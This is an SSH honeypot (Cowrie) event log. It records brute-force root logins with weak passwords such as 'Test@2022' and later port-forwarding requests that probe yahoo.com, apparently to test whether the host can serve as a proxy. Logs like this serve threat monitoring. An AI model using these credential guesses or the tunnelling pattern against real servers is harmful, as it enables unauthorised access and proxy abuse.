{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14612,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14612","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.579401Z","session":"835f96a7a164"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.636321Z","src_ip":"213.209.150.239","session":"835f96a7a164"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.694361Z","src_ip":"213.209.150.239","session":"835f96a7a164"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16641,"dst_ip":"1.2.3.4","dst_port":22,"session":"67b877cc0d32","protocol":"ssh","message":"New connection: 213.209.150.239:16641 (1.2.3.4:22) [session: 67b877cc0d32]","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.750072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.750805Z","src_ip":"213.209.150.239","session":"67b877cc0d32"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.807631Z","src_ip":"213.209.150.239","session":"67b877cc0d32"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.091261Z","src_ip":"213.209.150.239","session":"67b877cc0d32"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":22053,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22053","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.148764Z","session":"67b877cc0d32"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.205588Z","src_ip":"213.209.150.239","session":"67b877cc0d32"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":17063,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17063","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.363146Z","session":"67b877cc0d32"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.420099Z","src_ip":"213.209.150.239","session":"67b877cc0d32"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.477497Z","src_ip":"213.209.150.239","session":"67b877cc0d32"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16704,"dst_ip":"1.2.3.4","dst_port":22,"session":"b312835c0757","protocol":"ssh","message":"New connection: 213.209.150.239:16704 (1.2.3.4:22) [session: b312835c0757]","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.523865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.524564Z","src_ip":"213.209.150.239","session":"b312835c0757"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.572280Z","src_ip":"213.209.150.239","session":"b312835c0757"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.807229Z","src_ip":"213.209.150.239","session":"b312835c0757"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6601,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6601","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.855635Z","session":"b312835c0757"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.903158Z","src_ip":"213.209.150.239","session":"b312835c0757"}
{"eventid":"cowrie.login.success","username":"root","password":"Jayant@123","message":"login attempt [root/Jayant@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:04.924898Z","src_ip":"45.88.8.215","session":"71eb130040ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":4484,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4484","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.037643Z","session":"b312835c0757"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.084996Z","src_ip":"213.209.150.239","session":"b312835c0757"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.133219Z","src_ip":"213.209.150.239","session":"b312835c0757"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16750,"dst_ip":"1.2.3.4","dst_port":22,"session":"90edcb09e069","protocol":"ssh","message":"New connection: 213.209.150.239:16750 (1.2.3.4:22) [session: 90edcb09e069]","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.189131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.190191Z","src_ip":"213.209.150.239","session":"90edcb09e069"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.246840Z","src_ip":"213.209.150.239","session":"90edcb09e069"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.285966Z","src_ip":"45.88.8.215","session":"71eb130040ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.530305Z","src_ip":"213.209.150.239","session":"90edcb09e069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31646,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31646","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.588205Z","session":"90edcb09e069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.644999Z","src_ip":"213.209.150.239","session":"90edcb09e069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":9094,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9094","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.799116Z","session":"90edcb09e069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.855957Z","src_ip":"213.209.150.239","session":"90edcb09e069"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.913354Z","src_ip":"213.209.150.239","session":"90edcb09e069"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16805,"dst_ip":"1.2.3.4","dst_port":22,"session":"23af722d579b","protocol":"ssh","message":"New connection: 213.209.150.239:16805 (1.2.3.4:22) [session: 23af722d579b]","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.969030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:05.969714Z","src_ip":"213.209.150.239","session":"23af722d579b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.026933Z","src_ip":"213.209.150.239","session":"23af722d579b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.309457Z","src_ip":"213.209.150.239","session":"23af722d579b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6263,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6263","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.366941Z","session":"23af722d579b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.423911Z","src_ip":"213.209.150.239","session":"23af722d579b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11582,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11582","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.579248Z","session":"23af722d579b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.635996Z","src_ip":"213.209.150.239","session":"23af722d579b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.693703Z","src_ip":"213.209.150.239","session":"23af722d579b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16861,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f7f1fe06f2a","protocol":"ssh","message":"New connection: 213.209.150.239:16861 (1.2.3.4:22) [session: 6f7f1fe06f2a]","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.749250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.750215Z","src_ip":"213.209.150.239","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:06.806835Z","src_ip":"213.209.150.239","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.089525Z","src_ip":"213.209.150.239","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":913,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:913","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.147334Z","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.204331Z","src_ip":"213.209.150.239","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26344,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26344","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.359159Z","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.416935Z","src_ip":"213.209.150.239","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.474491Z","src_ip":"213.209.150.239","session":"6f7f1fe06f2a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16937,"dst_ip":"1.2.3.4","dst_port":22,"session":"7daa8c2b52e2","protocol":"ssh","message":"New connection: 213.209.150.239:16937 (1.2.3.4:22) [session: 7daa8c2b52e2]","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.530283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.531384Z","src_ip":"213.209.150.239","session":"7daa8c2b52e2"}
